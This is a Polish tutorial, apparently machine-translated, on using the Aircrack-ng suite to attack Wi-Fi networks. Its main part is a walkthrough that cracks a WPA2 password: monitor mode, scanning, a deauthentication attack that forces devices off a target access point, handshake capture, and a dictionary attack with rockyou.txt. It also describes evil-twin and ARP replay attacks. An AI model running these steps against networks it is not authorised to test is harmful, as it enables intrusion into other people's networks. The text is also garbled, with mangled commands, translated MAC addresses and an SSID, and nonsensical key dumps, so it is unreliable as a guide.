Jak korzystać z Aircrack-ng

How Use Aircrack Ng



Przez większość czasu ludzie nigdy nie myślą o sieci, z którą są połączeni. Nigdy nie zastanawiają się, jak bezpieczna jest ta sieć i jak bardzo codziennie ryzykują swoimi poufnymi danymi. Możesz uruchomić sprawdzanie podatności sieci Wi-Fi za pomocą bardzo potężnego narzędzia o nazwie Aircrack-ng i Wireshark. Wireshark służy do monitorowania aktywności sieciowej. Aircrack-ng jest bardziej jak agresywne narzędzie, które pozwala włamać się i dać dostęp do połączeń bezprzewodowych. Myślenie jak intruz zawsze było najbezpieczniejszym sposobem ochrony przed włamaniami. Możesz być w stanie uchwycić dokładne działania, które intruz podejmie, aby uzyskać dostęp do twojego systemu, poznając aircrack. Następnie możesz przeprowadzić kontrole zgodności we własnym systemie, aby upewnić się, że nie jest on niepewny.

Aircrack-ng to pełny zestaw oprogramowania przeznaczonego do testowania bezpieczeństwa sieci WiFi. To nie tylko pojedyncze narzędzie, ale zbiór narzędzi, z których każde spełnia określony cel. Można pracować nad różnymi obszarami bezpieczeństwa Wi-Fi, takimi jak monitorowanie Punktu Dostępowego, testowanie, atakowanie sieci, łamanie sieci Wi-Fi i jej testowanie. Głównym celem Aircrack jest przechwycenie pakietów i odszyfrowanie skrótów w celu złamania haseł. Obsługuje prawie wszystkie nowe interfejsy bezprzewodowe. Aircrack-ng to ulepszona wersja przestarzałego zestawu narzędzi Aircrack, ng odnosi się do Nowe pokolenie . Niektóre z niesamowitych narzędzi, które współpracują ze sobą przy większych zadaniach.







Airmon:

Airmon-ng jest zawarty w zestawie aircrack-ng, który przełącza kartę sieciową w tryb monitora. Karty sieciowe zwykle akceptują tylko pakiety skierowane do nich zgodnie z definicją adresu MAC karty sieciowej, ale w przypadku airmon-ng wszystkie pakiety bezprzewodowe, niezależnie od tego, czy są dla nich skierowane, czy nie, będą również akceptowane. Powinieneś być w stanie przechwycić te pakiety bez łączenia się lub uwierzytelniania z punktem dostępowym. Służy do sprawdzania stanu Punktu Dostępowego poprzez przełączenie interfejsu sieciowego w tryb monitora. Najpierw należy skonfigurować karty bezprzewodowe, aby włączały tryb monitora, a następnie zabić wszystkie procesy w tle, jeśli uważasz, że jakiś proces mu przeszkadza. Po zakończeniu procesów tryb monitorowania można włączyć na interfejsie bezprzewodowym, uruchamiając poniższe polecenie:



[e-mail chroniony] :~$sudoairmon-ng start wlan0#

Możesz także wyłączyć tryb monitorowania, zatrzymując airmon-ng w dowolnym momencie za pomocą poniższego polecenia:

[e-mail chroniony] :~$sudoprzystanek airmon-ng wlan0#

Zrzut powietrza:

Airodump-ng służy do tworzenia listy wszystkich otaczających nas sieci i przeglądania cennych informacji na ich temat. Podstawową funkcjonalnością airodump-ng jest podsłuchiwanie pakietów, więc zasadniczo jest zaprogramowany do przechwytywania wszystkich pakietów wokół nas, gdy jest przełączony w tryb monitorowania. Przeprowadzimy go dla wszystkich połączeń wokół nas i zbierzemy dane, takie jak liczba klientów podłączonych do sieci, odpowiadające im adresy mac, styl szyfrowania i nazwy kanałów, a następnie zaczniemy celować w naszą sieć docelową.

Wpisując polecenie airodump-ng i podając mu nazwę interfejsu sieciowego jako parametr, możemy aktywować to narzędzie. Wymieni wszystkie punkty dostępowe, ilość pakietów danych, stosowane metody szyfrowania i uwierzytelniania oraz nazwę sieci (ESSID). Z hakerskiego punktu widzenia adresy mac są najważniejszymi polami.

[e-mail chroniony] :~$sudoairodump-ng wlx0mon

Kraking lotniczy:

Aircrack służy do łamania haseł. Po przechwyceniu wszystkich pakietów za pomocą airodump możemy złamać klucz przez aircrack. Łamie te klucze za pomocą dwóch metod PTW i FMS. Podejście PTW odbywa się w dwóch fazach. Na początku używane są tylko pakiety ARP, a dopiero potem, jeśli klucz nie zostanie złamany po wyszukiwaniu, wykorzystuje wszystkie pozostałe przechwycone pakiety. Zaletą podejścia PTW jest to, że nie wszystkie pakiety są wykorzystywane do crackowania. W drugim podejściu, tj. FMS, do złamania klucza używamy zarówno modeli statystycznych, jak i algorytmów brute force. Można również użyć metody słownikowej.

Aireplay:

Airplay-ng wprowadza pakiety do sieci bezprzewodowej w celu tworzenia lub przyspieszania ruchu. Aireplay-ng może przechwytywać pakiety z dwóch różnych źródeł. Pierwsza to sieć na żywo, a druga to pakiety z już istniejącego pliku pcap. Airplay-ng jest przydatny podczas ataku deauthentication, którego celem jest bezprzewodowy punkt dostępowy i użytkownik. Co więcej, możesz wykonać niektóre ataki, takie jak atak kawy latte, za pomocą airplay-ng, narzędzia, które pozwala uzyskać klucz z systemu klienta. Możesz to osiągnąć, przechwytując pakiet ARP, a następnie manipulując nim i wysyłając go z powrotem do systemu. Następnie klient utworzy pakiet, który może zostać przechwycony przez airodump i aircrack złamie klucz ze zmodyfikowanego pakietu. Niektóre inne opcje ataku airplay-ng obejmują chopchop, fragment arepreplay itp.

Baza Lotnicza:

Airbase-ng służy do przekształcania komputera intruza w zagrożony punkt połączenia, z którym inni mogą się połączyć. Korzystając z Airbase-ng, możesz twierdzić, że jesteś legalnym punktem dostępu i przeprowadzać ataki typu man-in-the-middle na komputery podłączone do Twojej sieci. Tego rodzaju ataki nazywane są Złymi Bliźniaczymi Atakami. Podstawowi użytkownicy nie są w stanie odróżnić legalnego punktu dostępu od fałszywego punktu dostępu. Tak więc zło bliźniacze zagrożenie jest jednym z najgroźniejszych zagrożeń bezprzewodowych, z jakimi mamy dziś do czynienia.

Airolib-ng:

Airolib przyspiesza proces hakowania, przechowując i zarządzając listami haseł i punktem dostępu. System zarządzania bazą danych używany przez ten program to SQLite3, który jest w większości dostępny na wszystkich platformach. Łamanie haseł obejmuje obliczenie pary klucza głównego, za pomocą którego wyodrębniany jest prywatny klucz przejściowy (PTK). Korzystając z PTK, można określić kod identyfikacyjny komunikatu ramki (MIC) dla danego pakietu i teoretycznie znaleźć MIC podobny do pakietu, więc jeśli PTK było poprawne, to PMK również miało rację.

Aby zobaczyć listy haseł i sieci dostępowe zapisane w bazie danych, wpisz następujące polecenie:

[e-mail chroniony] :~$sudoairolib-ng testdatabase –statystyki

Tutaj testdatabase to baza danych, do której chcesz uzyskać dostęp lub którą chcesz utworzyć, a –stats to operacja, którą chcesz na niej wykonać. Możesz wykonać wiele operacji na polach bazy danych, na przykład nadać maksymalny priorytet pewnemu identyfikatorowi SSID lub coś takiego. Aby użyć airolib-ng z aircrack-ng, wpisz następujące polecenie:

[e-mail chroniony] :~$sudoaircrack-ng-rbaza danych testowych wpa2.eapol.cap

Tutaj używamy już obliczonych PMK przechowywanych w testowa baza danych do przyspieszenia procesu łamania haseł.

Łamanie WPA/WPA2 za pomocą Aircrack-ng:

Spójrzmy na mały przykład tego, co aircrack-ng może zrobić za pomocą kilku niesamowitych narzędzi. Złamiemy klucz wstępny sieci WPA/WPA2 za pomocą metody słownikowej.

Pierwszą rzeczą, którą musimy zrobić, to wymienić interfejsy sieciowe obsługujące tryb monitora. Można to zrobić za pomocą następującego polecenia:

[e-mail chroniony] :~$sudoairmon-ng

Chipset sterownika interfejsu PHY

Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.

Widzimy interfejs; teraz musimy ustawić znaleziony interfejs sieciowy ( wlx0 ) w trybie monitora za pomocą następującego polecenia:

[e-mail chroniony] :~$sudoairmon-ng start wlx0

Ma włączony tryb monitorowania na interfejsie o nazwie wlx0mon .

Teraz powinniśmy zacząć nasłuchiwać transmisji z pobliskich routerów za pośrednictwem naszego interfejsu sieciowego, który przestawiliśmy w tryb monitorowania.

[e-mail chroniony] :~$sudoairodump-ng wlx0mon

CH5 ][Upłynęło:30s][ 2020-12-02 00:17



Sygnalizatory BSSID PWR#Dane, #/s CH MB ENC CIPHER AUTH ESSID



E4: 6F:13: 04: CE:31 -Cztery pięć 62 27 0 154e WPA2 CCMP PSK CrackIt

C4:E9:84:76:10:BYĆ-63 77 0 0 654e. WPA2 CCMP PSK Hackme

C8:3A:35: A0: 4E: 01-63 84 0 0 854e WPA2 CCMP PSK Net07

74:DAJE:88:FA:38: 02-68 28 2 0 jedenaście54e WPA2 CCMP PSK TP-Link_3802



Sonda szybkości utraconych klatek BSSID STATION PWR



E4: 6F:13: 04: CE:315C:3A:Cztery pięć: D7: EA: 8B -3 0- 1e8 5

E4: 6F:13: 04: CE:31C4:67:D3:C2:CD:D7 -331e- 6e0 3

E4: 6F:13: 04: CE:315C:C3:07:56:61: EF -35 0-1 0 6

E4: 6F:13: 04: CE:31PNE:91:B5:F8:7E:D5 -390e-1 1002 13

Nasza sieć docelowa to Rozwal to w tym przypadku, który jest aktualnie uruchomiony na kanale 1.

Tutaj, aby złamać hasło do sieci docelowej, musimy przechwycić 4-kierunkowy uścisk dłoni, który ma miejsce, gdy urządzenie próbuje połączyć się z siecią. Możemy to uchwycić za pomocą następującego polecenia:

[e-mail chroniony] :~$sudoairodump-ng-C 1--bssid E4: 6F:13: 04: CE:31 -w /dom wlx0

-C : Kanał

–Bss : Bssid sieci docelowej

-w : Nazwa katalogu, w którym zostanie umieszczony plik pcap

Teraz musimy poczekać, aż urządzenie połączy się z siecią, ale istnieje lepszy sposób na przechwycenie uścisku dłoni. Możemy deauthentication urządzeń do AP za pomocą ataku deauthentication za pomocą następującego polecenia:

[e-mail chroniony] :~$sudoaireplay-ng-0 -doE4: 6F:13: 04: CE:31

do : Bssid sieci docelowej

-0 : atak deautentyczny

Odłączyliśmy wszystkie urządzenia i teraz musimy poczekać, aż urządzenie połączy się z siecią.

CH1 ][Upłynęło:30s][ 2020-12-02 00:02][Uzgadnianie WPA: E4: 6F:13: 04: CE:31



BSSID PWR RXQ Beacons#Dane, #/s CH MB ENC CIPHER AUTH E



E4: 6F:13: 04: CE:31 -47 1 228 807 36 154. WPA2 CCMP PSK P



Sonda szybkości utraconych klatek BSSID STATION PWR



E4: 6F:13: 04: CE:31PNE:91:B5:F8:7E:D5 -35 0-1 0 1

E4: 6F:13: 04: CE:315C:3A:Cztery pięć: D7: EA: 8B -290e- 1e0 22

E4: 6F:13: 04: CE:31 88:28: B3:30:27:7E -310e-1 0 32

E4: 6F:13: 04: CE:31C4:67:D3:C2:CD:D7 -350e- 6e263 708Rozwal to

E4: 6F:13: 04: CE:31D4: 6A: 6A:99:ED:E3 -350e- 0e0 86

E4: 6F:13: 04: CE:315C:C3:07:56:61: EF -37 0- 1e0 1

Dostaliśmy trafienie i patrząc na prawy górny róg tuż obok godziny, widzimy, że uścisk dłoni został uchwycony. Teraz spójrz do określonego folderu ( /Dom w naszym przypadku ) dla .pcap plik.

Aby złamać klucz WPA, możemy użyć następującego polecenia:

[e-mail chroniony] :~$sudoaircrack-ng-a2 -wrockyou.txt-bE4: 6F:13: 04: CE:31uścisk dłoni.nasadka

b :Bssid sieci docelowej

-a2: tryb WPA2

Rockyou.txt: słownikplikużywany

Handshake.cap: Theplik któryzawiera przechwycony uścisk dłoni

Aircrack-ng1.2beta3

[00:01:49] 10566przetestowane klucze(1017,96do/s)

ZNALEZIONO KLUCZ! [masz mnie]

Klucz główny: 8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B 7B 6D

0C 06 08 ED BC 6B H7 J8 K1 A0896B 7B B F7 6FpięćdziesiątC


Klucz przejściowy: 4D C4 5R 6T76 996G 7H 8D WE

H7 J8 K1 A0896B 7B 6D AF 5B 8D 2D A0896B

A5 BD K1 A0896B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A089

8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B

MAC: CB 5A F8 CE62B2 1B F7 6FpięćdziesiątC025 62E9 5D71

Klucz do naszej sieci docelowej został pomyślnie złamany.

Wniosek:

Sieci bezprzewodowe są wszędzie, używane przez każdą firmę, od pracowników korzystających ze smartfonów po przemysłowe urządzenia sterujące. Według badań, w 2021 r. prawie ponad 50 proc. ruchu internetowego będzie odbywało się przez WiFi. Sieci bezprzewodowe mają wiele zalet, komunikacja poza drzwiami, szybki dostęp do Internetu w miejscach, gdzie prawie niemożliwe jest ułożenie przewodów, można rozbudować sieć bez instalowania kabli dla każdego innego użytkownika i możesz łatwo łączyć urządzenia mobilne z biurami domowymi, gdy Cię tam nie ma.

Pomimo tych zalet, istnieje duży znak zapytania dotyczący Twojej prywatności i bezpieczeństwa. Ponieważ te sieci; routery znajdujące się w zasięgu transmisji są otwarte dla wszystkich, mogą być łatwo zaatakowane, a Twoje dane mogą zostać łatwo skompromitowane. Na przykład, jeśli masz połączenie z jakimś publicznym Wi-Fi, każdy podłączony do tej sieci może łatwo sprawdzić ruch sieciowy za pomocą pewnej inteligencji i za pomocą dostępnych niesamowitych narzędzi, a nawet go zrzucić.